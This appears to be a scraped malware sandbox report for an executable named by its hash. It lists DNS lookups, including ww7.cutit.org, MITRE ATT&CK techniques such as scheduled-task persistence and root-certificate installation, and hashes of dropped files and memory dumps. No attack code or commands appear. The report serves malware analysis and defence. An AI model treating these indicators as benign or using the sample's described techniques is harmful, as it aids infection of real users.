1
1

DNS Request

248.240.91.64.in-addr.arpa
8.8.8.8:53

32.169.19.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

32.169.19.2.in-addr.arpa
8.8.8.8:53

ww7.cutit.org

dns

79f8a6855bff25672d8de0eb51b794ca.exe

59 B
104 B
1
1

DNS Request

ww7.cutit.org

DNS Response

199.59.243.225
8.8.8.8:53

201.179.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

201.179.17.96.in-addr.arpa
8.8.8.8:53

225.243.59.199.in-addr.arpa

dns

73 B
131 B
1
1

DNS Request

225.243.59.199.in-addr.arpa
8.8.8.8:53

183.59.114.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

183.59.114.20.in-addr.arpa
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

171.39.242.20.in-addr.arpa
8.8.8.8:53

18.134.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

18.134.221.88.in-addr.arpa
8.8.8.8:53

194.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

194.178.17.96.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Scheduled Task/Job

Privilege Escalation

Scheduled Task/Job

Defense Evasion

Modify Registry

Subvert Trust Controls

Install Root Certificate

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\79f8a6855bff25672d8de0eb51b794ca.exe

Filesize
490KB

MD5
25b476efa856acbc4c9bbc4a23c07217

SHA1
db4f564e11f7288480f0683dccbb3a75d21795ed

SHA256
27dea62bf319e864c1bad3d07e0e8488a7b208cb1ef0174bcc048579fc626fba

SHA512
5eb4a0b340ff2e479c6f7be421a4afc05f10ea302e5aa8195e69d848dd2bd2bdc5278bca69ca9aaa6ba537bdb08d66a47c3e802f47b9274e7f95850e7ed2ef40

Download Submit
C:\Users\Admin\AppData\Local\Temp\cVgg8tb.xml

Filesize
1KB

MD5
ffa7ffc147b208f2d12d062cf8750edb

SHA1
b3af64041b596af4c0710fdbc95860fc7e7f4414

SHA256
b24740fad1d1b0779bdfebe4dca1564b5c464d1dc303195a0d0a54568a5ce75a

SHA512
f5f7d263820d5eeeca4ae227c9ae5a5034beaa130120cb76a9cd8d57074c26c6cf360784f78e14d1b0b5674a7f3ffd3e35b7e95347a37b0d6bfc0a72da177254

Download Submit
memory/1208-0-0x0000000000400000-0x000000000065C000-memory.dmp

Filesize
2.4MB

Download
memory/1208-2-0x0000000000400000-0x000000000046B000-memory.dmp

Filesize
428KB

Download
memory/1208-1-0x0000000025030000-0x00000000250AE000-memory.dmp

Filesize
504KB

Download
memory/1208-13-0x0000000000400000-0x000000000046B000-memory.dmp

Filesize
428KB

Download
memory/4820-15-0x0000000023FA0000-0x000000002401E000-memory.dmp

Filesize
504KB

Download
memory/4820-18-0x0000000000400000-0x000000000065C000-memory.dmp

Filesize
2.4MB

Download
memory/4820-22-0x0000000000400000-0x000000000045B000-memory.dmp

Filesize
364KB

Download
memory/4820-23-0x00000000004B0000-0x000000000051B000-memory.dmp

Filesize
428KB

Download
memory/4820-40-0x0000000000400000-0x000000000065C000-memory.dmp

Filesize
2.4MB

Download